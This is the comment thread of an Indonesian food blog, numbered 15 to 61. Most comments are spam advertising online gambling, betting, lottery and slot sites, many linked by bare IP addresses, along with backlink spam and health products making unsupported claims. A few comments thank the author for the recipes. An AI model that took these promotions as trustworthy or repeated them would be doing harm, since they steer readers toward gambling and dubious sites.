  15. 𝐌𝐞𝐧𝐲𝐞𝐝𝐢𝐚𝐤𝐚𝐧 𝐁𝐞𝐫𝐛𝐚𝐠𝐚𝐢 𝐉𝐞𝐧𝐢𝐬 𝐏𝐞𝐫𝐦𝐚𝐢𝐧𝐚𝐧 𝐇𝐚𝐧𝐲𝐚 𝐃𝐞𝐧𝐠𝐚𝐧 𝟏 𝐔𝐬𝐞𝐫𝐧𝐚𝐦𝐞 𝐌𝐮𝐥𝐚𝐢 𝐝𝐚𝐫𝐢 𝐩𝐞𝐫𝐦𝐚𝐢𝐧𝐚𝐧 𝐒𝐩𝐨𝐫𝐭𝐬𝐛𝐨𝐨𝐤 , 𝐋𝐢𝐯𝐞 𝐂𝐚𝐬𝐢𝐧𝐨 , 𝐒𝐚𝐛𝐮𝐧𝐠 𝐀𝐲𝐚𝐦 , 𝐒𝐥𝐨𝐭 𝐬𝐚𝐦𝐩𝐚𝐢 𝐝𝐞𝐧𝐠𝐚𝐧 𝐆𝐚𝐦𝐞𝐬 𝐝𝐢 𝐏𝐨𝐤𝐞𝐫 𝐈𝐃𝐍

    𝐍𝐢𝐤𝐦𝐚𝐭𝐢 𝐁𝐞𝐫𝐛𝐚𝐠𝐚𝐢 𝐊𝐞𝐮𝐧𝐭𝐮𝐧𝐠𝐚𝐧 𝐁𝐞𝐫𝐦𝐚𝐢𝐧 𝐝𝐢 𝐐𝐐𝟗𝟔𝐀𝐂𝐄 𝐁𝐞𝐫𝐢𝐤𝐮𝐭 𝐈𝐧𝐢

    * 𝐅𝐫𝐞𝐞 𝐑𝐞𝐠𝐢𝐬𝐭𝐞𝐫
    * 𝟏𝟎𝟎% 𝐓𝐞𝐫𝐩𝐞𝐫𝐜𝐚𝐲𝐚 & 𝟏𝟎𝟎% 𝐅𝐚𝐢𝐫𝐩𝐥𝐚𝐲
    * 𝐍𝐨 𝐁𝐨𝐭 𝐏𝐥𝐚𝐲𝐞𝐫 𝐕𝐬 𝐏𝐥𝐚𝐲𝐞𝐫
    * 𝐌𝐞𝐧𝐚𝐧𝐠 𝐁𝐞𝐫𝐚𝐩𝐚𝐩𝐮𝐧 𝐀𝐧𝐝𝐚 𝟏𝟎𝟎% 𝐃𝐢𝐣𝐚𝐦𝐢𝐧 𝐁𝐞𝐫𝐚𝐧𝐢 𝐁𝐀𝐘𝐀𝐑
    * 𝐒𝐞𝐦𝐮𝐚 𝐆𝐚𝐦𝐞𝐬 𝐁𝐢𝐬𝐚 𝐃𝐢𝐦𝐚𝐢𝐧𝐤𝐚𝐧 𝐝𝐢 𝐏𝐂/𝐀𝐧𝐝𝐫𝐨𝐢𝐝/𝐈𝐎𝐒
    * 𝟐𝟒 𝐉𝐚𝐦 𝐂𝐮𝐬𝐭𝐨𝐦𝐞𝐫 𝐒𝐞𝐫𝐯𝐢𝐜𝐞 𝐃𝐞𝐧𝐠𝐚𝐧 𝐏𝐞𝐥𝐚𝐲𝐚𝐧𝐚𝐧 𝐌𝐮𝐝𝐚𝐡
    * 𝐃𝐚𝐫𝐢 𝐁𝐨𝐧𝐮𝐬 𝐃𝐞𝐩𝐨𝐬𝐢𝐭 , 𝐂𝐚𝐬𝐡𝐛𝐚𝐜𝐤 , 𝐑𝐞𝐛𝐚𝐭𝐞 & 𝐑𝐨𝐥𝐥𝐢𝐧𝐠𝐚𝐧

    𝐀𝐲𝐨 𝐓𝐮𝐧𝐠𝐠𝐮 𝐀𝐩𝐚𝐥𝐚𝐠𝐢
    𝐘𝐮𝐤 𝐛𝐮𝐫𝐮𝐚𝐧 𝐡𝐮𝐛𝐮𝐧𝐠𝐢 𝐂𝐒 𝐮𝐧𝐭𝐮𝐤 𝐢𝐧𝐟𝐨 𝐥𝐚𝐢𝐧𝐧𝐲𝐚 :
    𝐋𝐢𝐯𝐞𝐜𝐡𝐚𝐭 𝟐𝟒/𝟕 𝐎𝐧𝐥𝐢𝐧𝐞 𝐅𝐚𝐬𝐭 𝐑𝐞𝐬𝐩𝐨𝐧𝐝 **
    • 𝐖𝐡𝐚𝐭𝐬𝐚𝐩𝐩 𝟏 : +𝟔𝟐 𝟖𝟓𝟕 𝟔𝟐𝟔𝟐 𝟗𝟓𝟔𝟗 [ 𝐅𝐚𝐬𝐭 𝐑𝐞𝐬𝐩𝐨𝐧𝐝 ]
    • 𝐖𝐡𝐚𝐭𝐬𝐚𝐩𝐩 𝟐 : +𝟖𝟓𝟓 𝟗𝟕 𝟒𝟑𝟖 𝟕𝟕𝟖𝟐 [ 𝐅𝐚𝐬𝐭 𝐑𝐞𝐬𝐩𝐨𝐧𝐝 ]
    • 𝐋𝐈𝐍𝐄 : 𝟗𝟔𝐚𝐜𝐞𝐢𝐝𝐧
    • 𝐁𝐁𝐌 : 𝟗𝟔𝐚𝐜𝐞𝐢𝐝𝐧
    • 𝐈𝐧𝐬𝐭𝐚𝐠𝐫𝐚𝐦 : 𝐐𝐐𝟗𝟔𝐢𝐧𝐝𝐨

    BalasHapus
  16. SABUNG AYAM KHAS BALI HANYA DI www.ayamonline.live
    BISA MAIN VIA SMARTPHONE ANDA! KAPAN SAJA DAN DIMANA SAJA!
    BANYAK BONUS YANG DAPAT DIRAIH !
    DAFTAR SEKARANG JUGAAAA~ GRATIIIIS !

    WA: 0812-2222-995 !
    ADD BBM nya : BOLAVITA ~

    BalasHapus
  17. Mantapp Bikin ngiler..
    ada Juga ini resep paling enak dan sderhana Resep Dagig Sapi Lada Hitam Enak

    BalasHapus
  18. Yuk Merapat Best Betting Online Hanya Di AREATOTO
    Dalam 1 Userid Dapat Bermain Semua Permainan
    Yang Ada :
    TARUHAN BOLA - LIVE CASINO - SABUNG AYAM - TOGEL ONLINE ( Tanpa Batas Invest )
    Sekedar Nonton Bola ,
    Jika Tidak Pasang Taruhan , Mana Seru , Pasangkan Taruhan Anda Di areatoto
    Minimal Deposit Rp 20.000 Dan Withdraw Rp.50.000
    Proses Deposit Dan Withdraw ( EXPRES ) Super Cepat
    Anda Akan Di Layani Dengan Customer Service Yang Ramah
    Website Online 24Jam/Setiap Hariny

    BalasHapus
  19. Indeks berita terbaru hari ini dari peristiwa, kecelakaan, kriminal, hukum, berita unik, Politik, dan liputan khusus di Indonesia dan Internasional.
    Website : https://www.detik.com/

    BalasHapus
  20. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  21. Kriteria sebuah semen memang jadi prioritas utama pengembang dalam membangun sebuah gedung serbaguna. Kita bisa melihat ada banyak desain gedung serbaguna yang dibuat khusus untuk acara-cara penting berskala kecil. Maka dari itu tingkat kualitas dari Semen Jakarta sudah teruji baik dalam membangun hunian terbaik dari gedung serbaguna di tingkat kecamatan ataupun kelurahan. Sayangnya tidak banyak pengembang fokus pada kualitas semen, namun masih fokus pada desain bangunan gedung serbaguna tersebut.semenjakarta

    BalasHapus
  22. Permisi ya kak Admin ^^

    ituBola - ituBolaonline - Bandar Bola - Casino Online Baccarat - Dragon Tiger - Roulette - Sicbo - BlackJack

    Ayo Pasang Taruhanmu Sekarang di ItuBola
    Agen Judi Bola & Casino Online Terpercaya dan Terbaik di Indonesia.
    Minimal Deposit Rp. 25.000,- Dan untuk minimal Withdraw Rp. 50.000,-
    Proses Deposit & Withdraw Yang Tercepat.

    Menyediakan berbagai macam permainan Judi Bola & Casino Online Terlengkap.
    ( Taruhan Bola )
    ( Baccarat )
    ( Sicbo )
    ( Roulette )
    ( Dragon Tiger)
    ( Blackjack )

    => Bonus Cashback 5% (dibagikan setiap Hari Senin)
    => Customer Service 24 Jam Nonsto
    => Support Deposit Via Aplikasi OVO,PULSA,GOPAY

    Kontak Kami
    LINE : itubola757
    WECHAT : itubolanet
    WHATSAPP :+85517696120
    TELEGRAM : Itu Bola / +85517696120


    Link Alternatif
    ituBola Online

    Pusat Bantuan ituBola

    Agen Taruhan Judi Teraman, Situs Taruhan Judi Teraman, Agen JudiBola, Agen Judi Bola Online, Agen Bola Online, Agen Sportsbook, Judi Casino, Agen Judi Casino, Agen Casino Online, Agen Live CasinoTerpercaya

    BalasHapus
  23. Great website, I will hope more like this in the future ... Don't forget to visit my website at https://connect.unity.com/t/katieubeeho33

    BalasHapus
  24. Amazing blog I learned so many things about Dropshipping from your article, I really thank you for informative, Join my website at https://codevibrant.com/users/alanaejeule55/

    BalasHapus
  25. Situs Judi Poker Online Terpercaya melayani pembuatan ID dengan mudah dan gratis. Bonus new member 20% dan bonus rollingan tiap minggunya, proses cepat, aman, dan terpercaya.

    BalasHapus
  26. Thanks for sharing! don’t forget to visit our website at http://mifato.ru/author/lilyegooce22/

    BalasHapus
  27. the post you made is very good and very impressive as well as very useful for me, if you want to see more interesting things visit the website
    http://pureaffair.com/members/zaraibiiji/

    BalasHapus

  28. the post you made is very good and very impressive as well as very useful for me, if you want to see more interesting things visit the website
    http://thaifixing.com/author/zaraibiiji/

    BalasHapus
  29. This article is very detailed. I was looking at the unique tips you shown here. Agen Togel Terpercaya Di Indonesia

    BalasHapus
  30. Terima kasih karena telah berbagi informasi mengenai kuliner khas indonesia kak,informasi ini sangat bermanfaat bagi semua orang terutama bagi mereka yang ingin belajar membuat salah satu makanan khas Indonesia karena di dalam artikel ini juga sudah dilengakapi dengan bahan-bahan dalam pembuatan makanan tersebut.Kami tunggu postingan terbaru mengenai makanan khas dari Indonesia beserta bahan-bahan yang diperlukan dalam pembuatannya kak😊

    BalasHapus
  31. Slot Online Uang asli There is few website who post an informative and helpful article and this site one of them who post the article which is informative and good for us. I search lots of sites but this website has some quality and good post articles for me !!!

    BalasHapus
  32. Yuk cek website pertanian.uma.ac.id agribisnis.uma.ac.id

    BalasHapus
  33. Di http://www.grupodelecluse.com/ kita sediakan service yang mampu menolong beberapa pemain jikalau berlangsung masalah yang tidak dapat dituntaskan oleh beberapa pemain. Konsumen Service kita yang kerja mampu cepat menyikapi sebab kita kerja 24/7 sehari-harinya.

    BalasHapus
  34. hello murahcash situs judi online murahcash situs slot online indonesia terpercaya
    ribuan game slot online di situs daftar judi slot online kami selalu memberikan layanan terbaik kepada member kami, kami situs judi slot online terpercaya member kami sudah ribuan yang aktif

    BalasHapus
  35. hanya dalam waktu tidak sampai 5 menit anda sudah terdaftar sebagai member dan bisa langsung bermain diberbagai permainan poker yang ada yang pastinya sangat menguntungkan juga dong!! http://raisinpoker.com/situs-idn-poker-online-terbaik-di-indonesia-fasilitas-terlengkap/

    BalasHapus
  36. castletoto memiliki rating bagus sebagai bandar togel online http://128.199.187.54/

    BalasHapus
  37. Jangan lewatkan kesempatan untuk bergabung di Kakaktogel. Karena banyak hadiah dan bonus menarik yang bisa anda dapatkan jika bergabung dengan togel online ini sekarang juga. Tunggu apalagi jangan pemberitahuan kesempatan ini, untuk informasi lebih lanjut kunjungi link website nya disini http://entsaintetienne.free.fr/claroline1110/courses/JUDIONLINE_001/document/index.html.

    BalasHapus
  38. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  39. Datnglah ke Bengkel Motor Bekasi untuk mendapatkan layanan terbaik kami dan kunjungi website kami http://www.bengkelmotorbekasi.com

    BalasHapus
  40. bermainlah dengan kami slot online deposit pulsa tanpa potongan yang populer saat ini. https://198.252.110.85/

    BalasHapus
  41. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  42. jangan lewatkan kesempatan dapat keuntungan ratusan juta rupiah setiap hari dari situs resmi terpercaya kunjung link kami di putih slot

    BalasHapus
  43. jangan lewatkan kesempatan Anda untuk meraih jutaan rupiah setiap hari di situs judi online deposit pulsa tanpa potongan http://139.59.77.247/

    BalasHapus
  44. Kedai69 Agen Slot Online Indonesia Terbesar. Dapatkan Berbagai Macam Games Kedai69 Judi Slot Online Terbaik. Dapatkan Banyak Promo Dari Kedai69 Judi Slot Online Terpopuler!

    BalasHapus
  45. Silahkan Mampir membahas dan meuliskan asah asih asuh dalam kehidupan..



    https://enjoyedreading.blogspot.com/

    BalasHapus
  46. info seputar prediksi togel Online hanya ada di Autojp4d di https://https://autojp4d.com/

    BalasHapus
  47. How to get to Slots.lv Casino in Phoenix, AZ - DRMCD
    This guide shows you how to get to Slots.lv 성남 출장샵 Casino. Slots.lv's mobile casino 남원 출장샵 is located in Phoenix, No 부천 출장마사지 matter the type of slot 통영 출장샵 machine you 군산 출장마사지 play, you'll be

    BalasHapus
  48. situs slot dana dengan bonus deposit terbesar http://207.148.121.64/

    BalasHapus
  49. Watch and Download world's famous drama series Kurulus Osman in English on link below
    👇
    Kurulus Osman in English

    📢Get high quality backlinks for your
    Website with BacklinksIndexer
    BacklinksIndexer

    Crypto trading online course
    Join on link below
    Crypto quantum leap

    📒 Read Home doctor book online
    Then you will be a doctor for your family
    Home Doctor Book

    Join online YouTube course
    And be a professional YouTuber
    Tube Mastery and Monetization by matt

    Steel Bite Pro
    Best product for
    Teeth pain, cavities,teeth whitening and other oral health issues with money back guarantee
    🦷
    Steel Bite Pro

    BalasHapus
  50. Menyediakan berbagai jenis bonus cashback dan rollingan silahkan klik link ini https://170.187.225.205/

    BalasHapus
  51. Selamat Siang :)
    Mohon ijin Post Ya Admin :)
    Promo Menarik & Dapatkan Layanan Terbaik & Memiliki Permainan Terlengkap.
    Kunjungi Di Link : Situs Agen Deposit Slot Via Dana

    BalasHapus
  52. Pengeluaran Data Togel terbaru di bawah sangat diwajibkan untuk anda yang ingin mencari kemudahan saat ingin mengetahui data togel terbaru, kami dapat banyak keluhan informasi dari teman-teman kita dan alhasil terbentuklah sebuah tabel pemgeluaran data togel pasaran besar yang berada tepat bawah ini, kami memiliki beberapa pasaran yang terlaris dalam sejarah judi togel online. keluaran data togel terbaru yang ada di website kami cukup membantu dari sekian banyaknya bandar judi togel online, sebuah pengeluaran hongkong terbaru menjamin anda yang setiap harinya bermain judi online. jangan lupa pantengin terus pengeluaran togel terbaru dan terupdate tersebut.


    BalasHapus
  53. prediksi togel terupdate dan terpercaya bisa anda kunjungi di AUTOJP4D

    BalasHapus
  54. jika ingin mencari slot deposit via dana silahkan klik https://209.94.60.123

    BalasHapus
  55. Punya masalah air kuning, keruh, bau got, mengandung zat besi tinggi, mangan dll?? jangan khawatir, kamu hanya perlu pasang satu unit filter air Hidrofile saja dapat merubah air kuning, keruh, kotor, bau got, mengandung zat besi tinggi dan mangan menjadi jernih. Ayo! cepat pasang FILTER AIR HIDROFILE sekarang karena air sehat itu penting untuk kesehatan kamu dan keluarga.

    Fungsi :
    Filter penjernih air ini berfungsi untuk menyaring kotoran atau partikel-partikel yang tak kelihatan oleh kasat mata mulai dari zat mangan Mn, zat besi Fe dan menghilangkan bau, warna organik dan rasa pada air sehingga bisa meningkatkan kualitas air dan layak untuk digunakan.

    Spesifikasi Filter Air Hidrofile:
    Tinggi: 54”
    Diameter: 10”
    Kapasitas: 1000 – 2000 liter/jam

    Segera dapatkan Filter Air termurah di jawa timur melalui toko kami Karyana Sukses Mandiri di alamat Jl.Putra Bangsa RT.3 RW.5 Anggaswangi, Sukodono, Kab.Sidoarjo atau hubungi marketing kami untuk pemesanan atau konsultasi di nomor 087790009744.

    #filterair #penjernihair #penyaringair #saringanair #watercleaner #filterairsidoarjo #filterairsukodono #filterairkotor #filterairkeruh #filterairbau #filterairkuning #filterairzatbesi #filterairzatkapur #filterairgatal #filterairlumpur #filterairtanah #filterairpasir #filterairhitam #jualfilterair #jualpenjernihair #jualpenyaringair #jualsaringanair #jualwatercleaner #promofilterair #promopenjernihair #filterairmurah #filterairterlengkap #filterairterbagus #filterairjawatimur #filterairindonesia

    BalasHapus
  56. mari kak bantu baca blogger artikel kuliner aku ya
    Bola88 Food

    BalasHapus
  57. Hai Foodies bagi yang berminat makanan diatas bisa beli melalui akun kami @kulinerjauh , Paxel Market, Shopee dan Bukalapak atau bisa melalui No. 088908908707. Makanan dari @kulinerjauh disajikan secara fresh dan tanpa mengurangi cita rasa dari makanan tersebut.

    BalasHapus
  58. wah enak enak ya makanannya. jangan lupa juga kunjungi https://kelompok5.cyberwarrior.co.id/index.php/product/minshanstore/ yaa

    BalasHapus
  59. Gudeg ama lumpia is my favorite.

    Salam dari www.sparklepush.com

    BalasHapus
  60. Referensi banget si blog ini untuk aku yang pecinta kulineran dan aneka jajanan di Indonesia, thankyouu so muchhh kak

    BalasHapus
  61. Terimakasih atas resepnya sangat membantu

    BalasHapus